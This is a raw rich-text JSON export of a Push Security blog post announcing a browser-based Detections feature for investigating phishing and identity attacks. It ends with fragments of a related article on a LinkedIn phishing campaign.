",[],{},{"nodeType":178,"data":81581,"content":81582},{},[81583,81587,81594],{"nodeType":173,"value":81584,"marks":81585,"data":81586},"More recently, groups like ",[],{},{"nodeType":186,"data":81588,"content":81589},{"uri":63182},[81590],{"nodeType":173,"value":25071,"marks":81591,"data":81593},[81592],{"type":194},{},{"nodeType":173,"value":81595,"marks":81596,"data":81597}," have even been seen using malvertising techniques, delivering phishing links masquerading as paid Google ads.",[],{},{"nodeType":235,"data":81599,"content":81600},{},[81601],{"nodeType":173,"value":81602,"marks":81603,"data":81604},"Inadequate security logs",[],{},{"nodeType":178,"data":81606,"content":81607},{},[81608],{"nodeType":173,"value":81609,"marks":81610,"data":81611},"If you fail to spot the attack pre-account takeover, you’re reliant on being able to detect and investigate suspicious or malicious activity resulting from the compromise. ",[],{},{"nodeType":178,"data":81613,"content":81614},{},[81615,81619,81628],{"nodeType":173,"value":81616,"marks":81617,"data":81618},"This was more straightforward (if not easy) when you had the luxury of a ",[],{},{"nodeType":186,"data":81620,"content":81622},{"uri":81621},"https://pushsecurity.com/blog/shifting-detection-left-for-more-effective-itdr/",[81623],{"nodeType":173,"value":81624,"marks":81625,"data":81627},"typical on-prem network to fall back",[81626],{"type":194},{},{"nodeType":173,"value":81629,"marks":81630,"data":81631}," on. But with cloud exploitation taking place in a matter of minutes, you don’t get much warning — and your endpoint and network-based alarms can’t help you. ",[],{},{"nodeType":178,"data":81633,"content":81634},{},[81635,81639,81648],{"nodeType":173,"value":81636,"marks":81637,"data":81638},"The situation is further complicated by the fact that you simply don’t have the logs you need because of the huge variability in how cloud and SaaS services provide logs (with many ",[],{},{"nodeType":186,"data":81640,"content":81642},{"uri":81641},"https://pushsecurity.com/blog/minimum-viable-identity-security/#id-enable-security-teams-to-detect-and-respond-to-identity-attacks",[81643],{"nodeType":173,"value":81644,"marks":81645,"data":81647},"failing to provide security logs",[81646],{"type":194},{},{"nodeType":173,"value":81649,"marks":81650,"data":81651}," with relevant data points at all). So chances are you’re flying blind when it comes to large chunks of your business app suite. ",[],{},{"nodeType":178,"data":81653,"content":81654},{},[81655,81659,81667],{"nodeType":173,"value":81656,"marks":81657,"data":81658},"Ultimately, you’re stuck with what you can observe — typically network traffic. But ",[],{},{"nodeType":186,"data":81660,"content":81661},{"uri":75099},[81662],{"nodeType":173,"value":81663,"marks":81664,"data":81666},"even with a TLS-terminating proxy",[81665],{"type":194},{},{"nodeType":173,"value":81668,"marks":81669,"data":81670},", extracting fine-grained identity data points isn’t really achievable. You’re looking from the outside-in at malicious activity that’s happening in the user’s browser and trying to infer what happened.  ",[],{},{"nodeType":312,"data":81672,"content":81676},{"target":81673},{"sys":81674},{"id":81675,"type":317,"linkType":318},"7FMdHtbE63GMCavObETf3O",[],{"nodeType":235,"data":81678,"content":81679},{},[81680],{"nodeType":173,"value":81681,"marks":81682,"data":81683},"Spotty control enforcement",[],{},{"nodeType":178,"data":81685,"content":81686},{},[81687,81691,81696],{"nodeType":173,"value":81688,"marks":81689,"data":81690},"And in the case that you do identify that a user clicked a malicious link and ",[],{},{"nodeType":173,"value":81692,"marks":81693,"data":81695},"maybe ",[81694],{"type":1646},{},{"nodeType":173,"value":81697,"marks":81698,"data":81699},"entered their credentials into the page — now what? ",[],{},{"nodeType":178,"data":81701,"content":81702},{},[81703],{"nodeType":173,"value":81704,"marks":81705,"data":81706},"You can reset the account in the affected app, ideally terminating active sessions — which may or may not be possible, depending on the app. This might take a while if you don’t centrally manage the app, and involve some painful emergency phone calls to employees. ",[],{},{"nodeType":178,"data":81708,"content":81709},{},[81710],{"nodeType":173,"value":81711,"marks":81712,"data":81713},"What about apps where the same password is reused? ",[],{},{"nodeType":178,"data":81715,"content":81716},{},[81717],{"nodeType":173,"value":81718,"marks":81719,"data":81720},"Or if it’s an IdP account used for SSO, what about the other apps that might be accessible now? ",[],{},{"nodeType":178,"data":81722,"content":81723},{},[81724,81728,81736],{"nodeType":173,"value":81725,"marks":81726,"data":81727},"If the attacker has created stealthy backdoors that persist through credential changes (like ",[],{},{"nodeType":186,"data":81729,"content":81730},{"uri":832},[81731],{"nodeType":173,"value":81732,"marks":81733,"data":81735},"creating an API key or a malicious OAuth integration",[81734],{"type":194},{},{"nodeType":173,"value":81737,"marks":81738,"data":81739},") they could still be lurking in your environment.",[],{},{"nodeType":178,"data":81741,"content":81742},{},[81743],{"nodeType":173,"value":81744,"marks":81745,"data":81747},"Suddenly, you’re not dealing with one possible control point, you’re dealing with several. ",[81746],{"type":370},{},{"nodeType":178,"data":81749,"content":81750},{},[81751],{"nodeType":173,"value":81752,"marks":81753,"data":81754},"And if you can’t trace the attack back to a source — because your email solution missed it, or it didn’t come via email, how can you triage the impact to other users? ",[],{},{"nodeType":178,"data":81756,"content":81757},{},[81758],{"nodeType":173,"value":81759,"marks":81760,"data":81761},"It’s no wonder that security teams are struggling to adapt. ",[],{},{"nodeType":231,"data":81763,"content":81764},{},[],{"nodeType":169,"data":81766,"content":81767},{},[81768],{"nodeType":173,"value":81769,"marks":81770,"data":81772},"How Push is solving modern identity investigations in the browser",[81771],{"type":370},{},{"nodeType":178,"data":81774,"content":81775},{},[81776],{"nodeType":173,"value":81777,"marks":81778,"data":81779},"The good news? We’ve seen this phenomenon play out before: In the early 2010s, in fact, when AV evolved into EDR. What was the big innovation then? Getting inside the data stream, in real time, and detecting and responding from a much higher-fidelity source of telemetry.",[],{},{"nodeType":178,"data":81781,"content":81782},{},[81783],{"nodeType":173,"value":81784,"marks":81785,"data":81786},"This time around, security teams need tools that take them inside the browser layer.",[],{},{"nodeType":178,"data":81788,"content":81789},{},[81790],{"nodeType":173,"value":81791,"marks":81792,"data":81793},"This approach gives you the right vantage point to defend against and investigate browser-based identity attacks, providing access to:",[],{},{"nodeType":250,"data":81795,"content":81796},{},[81797,81807,81817,81827],{"nodeType":254,"data":81798,"content":81799},{},[81800],{"nodeType":178,"data":81801,"content":81802},{},[81803],{"nodeType":173,"value":81804,"marks":81805,"data":81806},"Full decrypted HTTP traffic — not just DNS and TCP/IP metadata",[],{},{"nodeType":254,"data":81808,"content":81809},{},[81810],{"nodeType":178,"data":81811,"content":81812},{},[81813],{"nodeType":173,"value":81814,"marks":81815,"data":81816},"Full user interaction tracing — every click, keystroke, or DOM change",[],{},{"nodeType":254,"data":81818,"content":81819},{},[81820],{"nodeType":178,"data":81821,"content":81822},{},[81823],{"nodeType":173,"value":81824,"marks":81825,"data":81826},"Full inspection at every layer of execution, not just the initial HTML served",[],{},{"nodeType":254,"data":81828,"content":81829},{},[81830],{"nodeType":178,"data":81831,"content":81832},{},[81833],{"nodeType":173,"value":81834,"marks":81835,"data":81836},"Full access to browser APIs, to correlate with browser history, local storage, cookies, etc.",[],{},{"nodeType":312,"data":81838,"content":81842},{"target":81839},{"sys":81840},{"id":81841,"type":317,"linkType":318},"5qt0s8e1TIEUxhU1GzFO63",[],{"nodeType":178,"data":81844,"content":81845},{},[81846],{"nodeType":173,"value":81847,"marks":81848,"data":81849},"With this data, teams have the information they need to respond to and investigate browser-based attacks. But to become valuable, this data needs a translation layer that turns it from raw logs into actionable information.",[],{},{"nodeType":178,"data":81851,"content":81852},{},[81853,81857,81861],{"nodeType":173,"value":81854,"marks":81855,"data":81856},"That’s where Push’s ",[],{},{"nodeType":173,"value":19231,"marks":81858,"data":81860},[81859],{"type":370},{},{"nodeType":173,"value":81862,"marks":81863,"data":81864}," capability comes in. With it, you can:",[],{},{"nodeType":250,"data":81866,"content":81867},{},[81868,81904,81914,81924,81934,81944],{"nodeType":254,"data":81869,"content":81870},{},[81871],{"nodeType":178,"data":81872,"content":81873},{},[81874,81878,81887,81891,81900],{"nodeType":173,"value":81875,"marks":81876,"data":81877},"Get alerted in your platform of choice (via the Push admin console, ",[],{},{"nodeType":186,"data":81879,"content":81881},{"uri":81880},"https://pushsecurity.com/help/audience/administrators/docs/connect-to-siem-or-soar/send-webhook-events-to-slack/",[81882],{"nodeType":173,"value":81883,"marks":81884,"data":81886},"Slack integration",[81885],{"type":194},{},{"nodeType":173,"value":81888,"marks":81889,"data":81890},", or your ",[],{},{"nodeType":186,"data":81892,"content":81894},{"uri":81893},"https://pushsecurity.com/help/audience/administrators/docs/connect-to-siem-or-soar/",[81895],{"nodeType":173,"value":81896,"marks":81897,"data":81899},"SIEM/SOAR",[81898],{"type":194},{},{"nodeType":173,"value":81901,"marks":81902,"data":81903}," of choice) whenever Push detects a browser-based attack, such as AiTM phishing or a cloned login page.",[],{},{"nodeType":254,"data":81905,"content":81906},{},[81907],{"nodeType":178,"data":81908,"content":81909},{},[81910],{"nodeType":173,"value":81911,"marks":81912,"data":81913},"Review a curated timeline of the incident: Where a phishing link originated; whether a user entered their credentials on the page; what kind of phishkit was used; and whether the attack was blocked by Push.",[],{},{"nodeType":254,"data":81915,"content":81916},{},[81917],{"nodeType":178,"data":81918,"content":81919},{},[81920],{"nodeType":173,"value":81921,"marks":81922,"data":81923},"See all the other impacted accounts and apps that shared a password with the phished account so you can remediate them.",[],{},{"nodeType":254,"data":81925,"content":81926},{},[81927],{"nodeType":178,"data":81928,"content":81929},{},[81930],{"nodeType":173,"value":81931,"marks":81932,"data":81933},"See a screenshot captured by the Push browser extension of the phishing page, so you can see exactly what the user saw before the page disappears.",[],{},{"nodeType":254,"data":81935,"content":81936},{},[81937],{"nodeType":178,"data":81938,"content":81939},{},[81940],{"nodeType":173,"value":81941,"marks":81942,"data":81943},"Get additional context from urlscan.io about the domains connected to the incident, helping you understand whether a domain has been reported as malicious by other users, when it was registered, and how many times it’s been scanned.",[],{},{"nodeType":254,"data":81945,"content":81946},{},[81947],{"nodeType":178,"data":81948,"content":81949},{},[81950],{"nodeType":173,"value":81951,"marks":81952,"data":81953},"Interrogate and send this telemetry to your SIEM for you to operationalize it as part of SecOps workflows and hunt across events for similar incident characteristics.",[],{},{"nodeType":312,"data":81955,"content":81959},{"target":81956},{"sys":81957},{"id":81958,"type":317,"linkType":318},"5iPYWpPx4IZ2M1DykQiWsN",[],{"nodeType":235,"data":81961,"content":81962},{},[81963],{"nodeType":173,"value":81964,"marks":81965,"data":81966},"Browser context",[],{},{"nodeType":178,"data":81968,"content":81969},{},[81970],{"nodeType":173,"value":81971,"marks":81972,"data":81973},"With Push, there’s no more: ",[],{},{"nodeType":250,"data":81975,"content":81976},{},[81977,81987,81997,82007,82017,82027],{"nodeType":254,"data":81978,"content":81979},{},[81980],{"nodeType":178,"data":81981,"content":81982},{},[81983],{"nodeType":173,"value":81984,"marks":81985,"data":81986},"Waiting (and hoping) that a browser-based attack gets recognized and reported by a user.",[],{},{"nodeType":254,"data":81988,"content":81989},{},[81990],{"nodeType":178,"data":81991,"content":81992},{},[81993],{"nodeType":173,"value":81994,"marks":81995,"data":81996},"Guesswork as to exactly what happened on the phishing page. ",[],{},{"nodeType":254,"data":81998,"content":81999},{},[82000],{"nodeType":178,"data":82001,"content":82002},{},[82003],{"nodeType":173,"value":82004,"marks":82005,"data":82006},"Struggling to get your hands on a live version of the page to see if it was actually malicious and getting thwarted because the attacker used a one-time phishing link. ",[],{},{"nodeType":254,"data":82008,"content":82009},{},[82010],{"nodeType":178,"data":82011,"content":82012},{},[82013],{"nodeType":173,"value":82014,"marks":82015,"data":82016},"Manually tracing the attack to see if it arrived by email so you can quarantine the messages. ",[],{},{"nodeType":254,"data":82018,"content":82019},{},[82020],{"nodeType":178,"data":82021,"content":82022},{},[82023],{"nodeType":173,"value":82024,"marks":82025,"data":82026},"Trawling through voluminous proxy logs for scraps of information (who else visited the link; where did it originate; etc.).",[],{},{"nodeType":254,"data":82028,"content":82029},{},[82030],{"nodeType":178,"data":82031,"content":82032},{},[82033],{"nodeType":173,"value":82034,"marks":82035,"data":82036},"Spending precious time on urlscan or VirusTotal to get basic context on a domain or IP address. ",[],{},{"nodeType":178,"data":82038,"content":82039},{},[82040],{"nodeType":173,"value":82041,"marks":82042,"data":82043},"Instead, Push gives you all the information you need in one place to investigate and respond. ",[],{},{"nodeType":178,"data":82045,"content":82046},{},[82047],{"nodeType":173,"value":82048,"marks":82049,"data":82050},"The foundation for these detections is the Push browser agent, which can be silently installed in all major browsers in your environment to begin streaming information about a user’s entire identity footprint. ",[],{},{"nodeType":178,"data":82052,"content":82053},{},[82054],{"nodeType":173,"value":82055,"marks":82056,"data":82057},"This valuable telemetry, combined with Push’s out-of-the-box controls and detections, gives you a seat on the user’s side of the equation, capturing reliable information about network requests, scripts loaded by a malicious website, and what a user clicked and navigated to: the ingredients for showing you how a browser-based attack unfolded, start to finish.",[],{},{"nodeType":312,"data":82059,"content":82063},{"target":82060},{"sys":82061},{"id":82062,"type":317,"linkType":318},"7ylgcaNDrxYhw7bULixM1C",[],{"nodeType":178,"data":82065,"content":82066},{},[82067],{"nodeType":173,"value":82068,"marks":82069,"data":82070},"Push raises a detection when it observes a phishing attack or when a user attempts to visit a blocked URL. You can view detections in the Push admin console, or send them to your SIEM or SOAR for correlation and analysis.",[],{},{"nodeType":235,"data":82072,"content":82073},{},[82074],{"nodeType":173,"value":82075,"marks":82076,"data":82077},"Screenshot capture",[],{},{"nodeType":178,"data":82079,"content":82080},{},[82081],{"nodeType":173,"value":82082,"marks":82083,"data":82084},"The Push extension can also capture a screenshot at the time of a detection firing. This means security teams can see the visual characteristics of the page even if it’s since been taken down (and no more looking at bot protection screens like Cloudflare Turnstile on urlscan). ",[],{},{"nodeType":312,"data":82086,"content":82090},{"target":82087},{"sys":82088},{"id":82089,"type":317,"linkType":318},"58HPrc7wImm3mLxPK0yJOG",[],{"nodeType":235,"data":82092,"content":82093},{},[82094],{"nodeType":173,"value":82095,"marks":82096,"data":82097},"Blast radius analysis for all impacted accounts & apps",[],{},{"nodeType":178,"data":82099,"content":82100},{},[82101],{"nodeType":173,"value":82102,"marks":82103,"data":82104},"With Push’s knowledge of your workforce identities — based on observing logins in the browser that use corporate credentials — the platform can also provide an analysis of the blast radius of an attack by showing you where other accounts and apps are impacted or at risk.",[],{},{"nodeType":178,"data":82106,"content":82107},{},[82108],{"nodeType":173,"value":82109,"marks":82110,"data":82111},"This information helps you understand the true impact of an incident so you can remediate all affected accounts.",[],{},{"nodeType":312,"data":82113,"content":82117},{"target":82114},{"sys":82115},{"id":82116,"type":317,"linkType":318},"77e8XMl2Rb0p7ZrG2wmURO",[],{"nodeType":178,"data":82119,"content":82120},{},[82121,82125,82133],{"nodeType":173,"value":82122,"marks":82123,"data":82124},"Push is able to provide this blast radius analysis by ",[],{},{"nodeType":186,"data":82126,"content":82127},{"uri":74370},[82128],{"nodeType":173,"value":82129,"marks":82130,"data":82132},"securely fingerprinting users’ passwords",[82131],{"type":194},{},{"nodeType":173,"value":82134,"marks":82135,"data":82136}," when a login is observed; analyzing them for security posture issues such as missing MFA, or stolen, weak, or reused passwords; and then raising that relevant context for a given detection.",[],{},{"nodeType":235,"data":82138,"content":82139},{},[82140],{"nodeType":173,"value":82141,"marks":82142,"data":82143},"Correlated context from urlscan.io",[],{},{"nodeType":178,"data":82145,"content":82146},{},[82147],{"nodeType":173,"value":82148,"marks":82149,"data":82150},"Finally, through an integration with urlscan.io, Push is able to provide additional context about the domains involved in a detection event, including:",[],{},{"nodeType":250,"data":82152,"content":82153},{},[82154,82164,82174,82184],{"nodeType":254,"data":82155,"content":82156},{},[82157],{"nodeType":178,"data":82158,"content":82159},{},[82160],{"nodeType":173,"value":82161,"marks":82162,"data":82163},"When they were created",[],{},{"nodeType":254,"data":82165,"content":82166},{},[82167],{"nodeType":178,"data":82168,"content":82169},{},[82170],{"nodeType":173,"value":82171,"marks":82172,"data":82173},"How many times they have previously been scanned",[],{},{"nodeType":254,"data":82175,"content":82176},{},[82177],{"nodeType":178,"data":82178,"content":82179},{},[82180],{"nodeType":173,"value":82181,"marks":82182,"data":82183},"When they were last scanned",[],{},{"nodeType":254,"data":82185,"content":82186},{},[82187],{"nodeType":178,"data":82188,"content":82189},{},[82190],{"nodeType":173,"value":82191,"marks":82192,"data":82193},"If urlscan has marked them as suspicious",[],{},{"nodeType":312,"data":82195,"content":82199},{"target":82196},{"sys":82197},{"id":82198,"type":317,"linkType":318},"2AKpAk65XdmaGBfe2V4qZ5",[],{"nodeType":231,"data":82201,"content":82202},{},[],{"nodeType":169,"data":82204,"content":82205},{},[82206],{"nodeType":173,"value":82207,"marks":82208,"data":82210},"Check out our latest webinar for practical guidance in real-world scenarios",[82209],{"type":370},{},{"nodeType":178,"data":82212,"content":82213},{},[82214,82218,82227,82230],{"nodeType":173,"value":82215,"marks":82216,"data":82217},"For practical advice and applied examples of how to use Push data in incident response — as well as some bonus examples of automated response and remediation use cases — ",[],{},{"nodeType":186,"data":82219,"content":82221},{"uri":82220},"https://pushsecurity.com/webinar/identity-detection-response",[82222],{"nodeType":173,"value":82223,"marks":82224,"data":82226},"join us live on August 13 for our webinar",[82225],{"type":194},{},{"nodeType":173,"value":2936,"marks":82228,"data":82229},[],{},{"nodeType":173,"value":82231,"marks":82232,"data":82234},"“Identity attacks have changed — have your IR playbooks?”",[82233],{"type":370},{},{"nodeType":231,"data":82236,"content":82237},{},[],{"nodeType":169,"data":82239,"content":82240},{},[82241],{"nodeType":173,"value":2824,"marks":82242,"data":82244},[82243],{"type":370},{},{"nodeType":178,"data":82246,"content":82247},{},[82248],{"nodeType":173,"value":70343,"marks":82249,"data":82250},[],{},{"nodeType":178,"data":82252,"content":82253},{},[82254],{"nodeType":173,"value":70350,"marks":82255,"data":82256},[],{},{"nodeType":178,"data":82258,"content":82259},{},[82260,82263,82270],{"nodeType":173,"value":61741,"marks":82261,"data":82262},[],{},{"nodeType":186,"data":82264,"content":82265},{"uri":473},[82266],{"nodeType":173,"value":70364,"marks":82267,"data":82269},[82268],{"type":194},{},{"nodeType":173,"value":37,"marks":82271,"data":82272},[],{},"We’re launching a new Detections capability, enabling security teams to more effectively investigate and triage alerts, and build more effective workflows. ","2025-07-29T00:00:00.000Z",{"items":82276},[82277,82279],{"sys":82278,"name":509},{"id":508},{"sys":82280,"name":505},{"id":504},{"items":82282},[82283],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":82284},{"url":2911},{"items":82286},[82287],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":82288},{"url":1496},{"json":82290,"links":82756},{"nodeType":165,"data":82291,"content":82292},{},[82293,82298,82304,82310,82316,82319,82326,82332,82348,82353,82359,82364,82370,82376,82381,82394,82399,82405,82410,82413,82420,82426,82433,82449,82455,82461,82468,82484,82491,82507,82514,82530,82535,82538,82545,82551,82590,82596,82602,82605,82612,82618,82654,82657,82664,82670,82711,82734,82740],{"nodeType":312,"data":82294,"content":82297},{"target":82295},{"sys":82296},{"id":58955,"type":317,"linkType":318},[],{"nodeType":178,"data":82299,"content":82300},{},[82301],{"nodeType":173,"value":58961,"marks":82302,"data":82303},[],{},{"nodeType":178,"data":82305,"content":82306},{},[82307],{"nodeType":173,"value":58968,"marks":82308,"data":82309},[],{},{"nodeType":178,"data":82311,"content":82312},{},[82313],{"nodeType":173,"value":58975,"marks":82314,"data":82315},[],{},{"nodeType":231,"data":82317,"content":82318},{},[],{"nodeType":169,"data":82320,"content":82321},{},[82322],{"nodeType":173,"value":24096,"marks":82323,"data":82325},[82324],{"type":370},{},{"nodeType":178,"data":82327,"content":82328},{},[82329],{"nodeType":173,"value":58992,"marks":82330,"data":82331},[],{},{"nodeType":178,"data":82333,"content":82334},{},[82335,82338,82345],{"nodeType":173,"value":58999,"marks":82336,"data":82337},[],{},{"nodeType":186,"data":82339,"content":82340},{"uri":59004},[82341],{"nodeType":173,"value":59007,"marks":82342,"data":82344},[82343],{"type":194},{},{"nodeType":173,"value":59012,"marks":82346,"data":82347},[],{},{"nodeType":312,"data":82349,"content":82352},{"target":82350},{"sys":82351},{"id":59019,"type":317,"linkType":318},[],{"nodeType":178,"data":82354,"content":82355},{},[82356],{"nodeType":173,"value":59025,"marks":82357,"data":82358},[],{},{"nodeType":312,"data":82360,"content":82363},{"target":82361},{"sys":82362},{"id":59032,"type":317,"linkType":318},[],{"nodeType":178,"data":82365,"content":82366},{},[82367],{"nodeType":173,"value":59038,"marks":82368,"data":82369},[],{},{"nodeType":178,"data":82371,"content":82372},{},[82373],{"nodeType":173,"value":59045,"marks":82374,"data":82375},[],{},{"nodeType":312,"data":82377,"content":82380},{"target":82378},{"sys":82379},{"id":59052,"type":317,"linkType":318},[],{"nodeType":178,"data":82382,"content":82383},{},[82384,82387,82391],{"nodeType":173,"value":59058,"marks":82385,"data":82386},[],{},{"nodeType":173,"value":59062,"marks":82388,"data":82390},[82389],{"type":370},{},{"nodeType":173,"value":59067,"marks":82392,"data":82393},[],{},{"nodeType":312,"data":82395,"content":82398},{"target":82396},{"sys":82397},{"id":59074,"type":317,"linkType":318},[],{"nodeType":178,"data":82400,"content":82401},{},[82402],{"nodeType":173,"value":59080,"marks":82403,"data":82404},[],{},{"nodeType":312,"data":82406,"content":82409},{"target":82407},{"sys":82408},{"id":59087,"type":317,"linkType":318},[],{"nodeType":231,"data":82411,"content":82412},{},[],{"nodeType":169,"data":82414,"content":82415},{},[82416],{"nodeType":173,"value":59096,"marks":82417,"data":82419},[82418],{"type":370},{},{"nodeType":178,"data":82421,"content":82422},{},[82423],{"nodeType":173,"value":59104,"marks":82424,"data":82425},[],{},{"nodeType":235,"data":82427,"content":82428},{},[82429],{"nodeType":173,"value":59111,"marks":82430,"data":82432},[82431],{"type":370},{},{"nodeType":178,"data":82434,"content":82435},{},[82436,82439,82446],{"nodeType":173,"value":59119,"marks":82437,"data":82438},[],{},{"nodeType":186,"data":82440,"content":82441},{"uri":58195},[82442],{"nodeType":173,"value":59126,"marks":82443,"data":82445},[82444],{"type":194},{},{"nodeType":173,"value":59131,"marks":82447,"data":82448},[],{},{"nodeType":178,"data":82450,"content":82451},{},[82452],{"nodeType":173,"value":59138,"marks":82453,"data":82454},[],{},{"nodeType":178,"data":82456,"content":82457},{},[82458],{"nodeType":173,"value":59145,"marks":82459,"data":82460},[],{},{"nodeType":235,"data":82462,"content":82463},{},[82464],{"nodeType":173,"value":59152,"marks":82465,"data":82467},[82466],{"type":370},{},{"nodeType":178,"data":82469,"content":82470},{},[82471,82474,82481],{"nodeType":173,"value":59160,"marks":82472,"data":82473},[],{},{"nodeType":186,"data":82475,"content":82476},{"uri":58235},[82477],{"nodeType":173,"value":59167,"marks":82478,"data":82480},[82479],{"type":194},{},{"nodeType":173,"value":59172,"marks":82482,"data":82483},[],{},{"nodeType":235,"data":82485,"content":82486},{},[82487],{"nodeType":173,"value":59179,"marks":82488,"data":82490},[82489],{"type":370},{},{"nodeType":178,"data":82492,"content":82493},{},[82494,82497,82504],{"nodeType":173,"value":59187,"marks":82495,"data":82496},[],{},{"nodeType":186,"data":82498,"content":82499},{"uri":50026},[82500],{"nodeType":173,"value":59194,"marks":82501,"data":82503},[82502],{"type":194},{},{"nodeType":173,"value":59199,"marks":82505,"data":82506},[],{},{"nodeType":235,"data":82508,"content":82509},{},[82510],{"nodeType":173,"value":59206,"marks":82511,"data":82513},[82512],{"type":370},{},{"nodeType":178,"data":82515,"content":82516},{},[82517,82520,82527],{"nodeType":173,"value":59214,"marks":82518,"data":82519},[],{},{"nodeType":186,"data":82521,"content":82522},{"uri":8419},[82523],{"nodeType":173,"value":59221,"marks":82524,"data":82526},[82525],{"type":194},{},{"nodeType":173,"value":59226,"marks":82528,"data":82529},[],{},{"nodeType":312,"data":82531,"content":82534},{"target":82532},{"sys":82533},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":82536,"content":82537},{},[],{"nodeType":169,"data":82539,"content":82540},{},[82541],{"nodeType":173,"value":59241,"marks":82542,"data":82544},[82543],{"type":370},{},{"nodeType":178,"data":82546,"content":82547},{},[82548],{"nodeType":173,"value":59249,"marks":82549,"data":82550},[],{},{"nodeType":250,"data":82552,"content":82553},{},[82554,82563,82572,82581],{"nodeType":254,"data":82555,"content":82556},{},[82557],{"nodeType":178,"data":82558,"content":82559},{},[82560],{"nodeType":173,"value":59262,"marks":82561,"data":82562},[],{},{"nodeType":254,"data":82564,"content":82565},{},[82566],{"nodeType":178,"data":82567,"content":82568},{},[82569],{"nodeType":173,"value":59272,"marks":82570,"data":82571},[],{},{"nodeType":254,"data":82573,"content":82574},{},[82575],{"nodeType":178,"data":82576,"content":82577},{},[82578],{"nodeType":173,"value":59282,"marks":82579,"data":82580},[],{},{"nodeType":254,"data":82582,"content":82583},{},[82584],{"nodeType":178,"data":82585,"content":82586},{},[82587],{"nodeType":173,"value":59292,"marks":82588,"data":82589},[],{},{"nodeType":178,"data":82591,"content":82592},{},[82593],{"nodeType":173,"value":59299,"marks":82594,"data":82595},[],{},{"nodeType":178,"data":82597,"content":82598},{},[82599],{"nodeType":173,"value":59306,"marks":82600,"data":82601},[],{},{"nodeType":231,"data":82603,"content":82604},{},[],{"nodeType":169,"data":82606,"content":82607},{},[82608],{"nodeType":173,"value":8967,"marks":82609,"data":82611},[82610],{"type":370},{},{"nodeType":178,"data":82613,"content":82614},{},[82615],{"nodeType":173,"value":59323,"marks":82616,"data":82617},[],{},{"nodeType":178,"data":82619,"content":82620},{},[82621,82624,82631,82634,82641,82644,82651],{"nodeType":173,"value":59330,"marks":82622,"data":82623},[],{},{"nodeType":186,"data":82625,"content":82626},{"uri":59335},[82627],{"nodeType":173,"value":59338,"marks":82628,"data":82630},[82629],{"type":194},{},{"nodeType":173,"value":2936,"marks":82632,"data":82633},[],{},{"nodeType":186,"data":82635,"content":82636},{"uri":59347},[82637],{"nodeType":173,"value":59350,"marks":82638,"data":82640},[82639],{"type":194},{},{"nodeType":173,"value":59355,"marks":82642,"data":82643},[],{},{"nodeType":186,"data":82645,"content":82646},{"uri":832},[82647],{"nodeType":173,"value":4519,"marks":82648,"data":82650},[82649],{"type":194},{},{"nodeType":173,"value":59366,"marks":82652,"data":82653},[],{},{"nodeType":231,"data":82655,"content":82656},{},[],{"nodeType":169,"data":82658,"content":82659},{},[82660],{"nodeType":173,"value":2824,"marks":82661,"data":82663},[82662],{"type":370},{},{"nodeType":178,"data":82665,"content":82666},{},[82667],{"nodeType":173,"value":59383,"marks":82668,"data":82669},[],{},{"nodeType":250,"data":82671,"content":82672},{},[82673,82692],{"nodeType":254,"data":82674,"content":82675},{},[82676],{"nodeType":178,"data":82677,"content":82678},{},[82679,82682,82689],{"nodeType":173,"value":37,"marks":82680,"data":82681},[],{},{"nodeType":186,"data":82683,"content":82684},{"uri":9120},[82685],{"nodeType":173,"value":59402,"marks":82686,"data":82688},[82687],{"type":194},{},{"nodeType":173,"value":37,"marks":82690,"data":82691},[],{},{"nodeType":254,"data":82693,"content":82694},{},[82695],{"nodeType":178,"data":82696,"content":82697},{},[82698,82701,82708],{"nodeType":173,"value":37,"marks":82699,"data":82700},[],{},{"nodeType":186,"data":82702,"content":82703},{"uri":59420},[82704],{"nodeType":173,"value":59423,"marks":82705,"data":82707},[82706],{"type":194},{},{"nodeType":173,"value":37,"marks":82709,"data":82710},[],{},{"nodeType":178,"data":82712,"content":82713},{},[82714,82717,82721,82724,82731],{"nodeType":173,"value":59434,"marks":82715,"data":82716},[],{},{"nodeType":173,"value":59438,"marks":82718,"data":82720},[82719],{"type":370},{},{"nodeType":173,"value":59443,"marks":82722,"data":82723},[],{},{"nodeType":186,"data":82725,"content":82726},{"uri":6820},[82727],{"nodeType":173,"value":8545,"marks":82728,"data":82730},[82729],{"type":194},{},{"nodeType":173,"value":59454,"marks":82732,"data":82733},[],{},{"nodeType":178,"data":82735,"content":82736},{},[82737],{"nodeType":173,"value":59461,"marks":82738,"data":82739},[],{},{"nodeType":178,"data":82741,"content":82742},{},[82743,82746,82753],{"nodeType":173,"value":59468,"marks":82744,"data":82745},[],{},{"nodeType":186,"data":82747,"content":82748},{"uri":473},[82749],{"nodeType":173,"value":1472,"marks":82750,"data":82752},[82751],{"type":194},{},{"nodeType":173,"value":1477,"marks":82754,"data":82755},[],{},{"entries":82757},{"hyperlink":82758,"inline":82759,"block":82760},[],[],[82761,82783,82786,82791,82796,82799,82807],{"sys":82762,"__typename":5311,"content":82763,"name":82782,"title":118},{"id":58955},{"json":82764},{"nodeType":165,"data":82765,"content":82766},{},[82767,82775],{"nodeType":178,"data":82768,"content":82769},{},[82770],{"nodeType":173,"value":82771,"marks":82772,"data":82774},"Update 15th September:",[82773],{"type":370},{},{"nodeType":178,"data":82776,"content":82777},{},[82778],{"nodeType":173,"value":82779,"marks":82780,"data":82781},"Since releasing this article we have observed further attacks using almost identical TTPs across a number of Push customers, specifically targeting technology firm executives. We've also had a number of people that aren't Push customers reach out to us after seeing attacks that are clearly part of the same campaign. So, we've added some additional information to help other security teams to investigate whether they have also been targeted. ",[],{},"Linkedin phishing attack insight box",{"sys":82784,"__typename":5345,"title":80156,"caption":80156,"layoutMode":118,"file":82785},{"id":59019},{"url":80158,"width":80159,"height":80160},{"sys":82787,"__typename":5345,"title":82788,"caption":82788,"layoutMode":118,"file":82789},{"id":59032},"Microsoft Dynamics page designed to look like a Google Drive form.",{"url":82790,"width":5358,"height":11942},"https://images.ctfassets.net/y1cdw1ablpvd/5TotEj06E6rZiR8jhY4QY1/7d8cf413dac2d0c5e078553f24ddb929/image4.png",{"sys":82792,"__typename":5345,"title":82793,"caption":82793,"layoutMode":118,"file":82794},{"id":59052},"Custom CAPTCHA pages are becoming increasingly 